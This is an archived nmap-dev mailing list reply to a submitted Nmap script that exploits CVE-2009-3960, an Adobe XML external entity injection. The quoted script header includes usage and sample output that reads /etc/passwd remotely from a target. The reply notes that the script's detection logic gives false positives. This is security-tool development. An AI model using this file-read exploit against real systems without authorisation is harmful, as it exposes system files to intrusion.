Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)

From: Patrik Karlsson <patrik () cqure net>
Date: Sun, 1 Jan 2012 21:12:00 +0100
On Sat, Dec 31, 2011 at 3:47 PM, Hani Benhabiles <kroosec () gmail com> wrote:


Hi list,

description = [[
Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.

This vulnerability permits to read local files remotely and is present in
BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0,  LiveCycle Data
Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and
ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0

For more information see:
*

http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
* http://www.osvdb.org/62292
* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
]]

---
-- @args http-cve-2009-3960.root Points to the root path. Defaults to "/"
-- @args http-cve-2009-3960.readfile target file to be read. Defaults to
"/etc/passwd"
--
-- @usage
-- nmap --script=http-cve-2009-3960 --script-arg
http-http-cve-2009-3960.root="/root/" <target>
--
--@output
-- PORT   STATE SERVICE
-- 80/tcp open  http
--| http-cve-2009-3960:
--|     samples/messagebroker/http
--|     <?xml version="1.0" encoding="utf-8"?>
--|     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object

type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string>
[...] root:x:0:0:root:/root:/bin/bash
--|     bin:*:1:1:bin:/bin:/sbin/nologin
--|     daemon:*:2:2:daemon:/sbin:/sbin/nologin
--|     adm:*:3:4:adm:/var/adm:/sbin/nologin
--|     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
--|     sync:*:5:0:sync:/sbin:/bin/sync
--|     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
--|     halt:*:7:0:halt:/sbin:/sbin/halt
--|     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
--|     news:*:9:13:news:/etc/news:
--|     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
--|     operator:*:11:0:operator:/root:/sbin/nologin
--|     games:*:12:100:games:/usr/games:/sbin/nologin
--|     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
--|     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
--|     nobody:*:99:99:Nobody:/:/sbin/nologin
--|     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
--|     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
--|     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
--|     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
--|     [...]
--|_

Cheers,
Hani

--
M. Hani Benhabiles
OWASP Algeria SC founder and president.
Blog: http://kroosec.blogspot.com
Twitter: kroosec <https://twitter.com/#%21/kroosec>

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/



Hi Hani,

Thanks for contributing with this new script! I've had a quick look at it
and see a problem with how it detects whether a server is vulnerable or
not. As an example, the current script will detect any server responding to
a non existant page (404) with a 200 OK with a body exceeding 120
characters as vulnerable. I guess the script needs to check for some other
characteristics as well. Unfortunately I don't have access to anything I
can test against, but if you have some packet captures I might be able to
lend you a hand.

Cheers,
Patrik

-- 
Patrik Karlsson
http://www.cqure.net
http://twitter.com/nevdull77
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: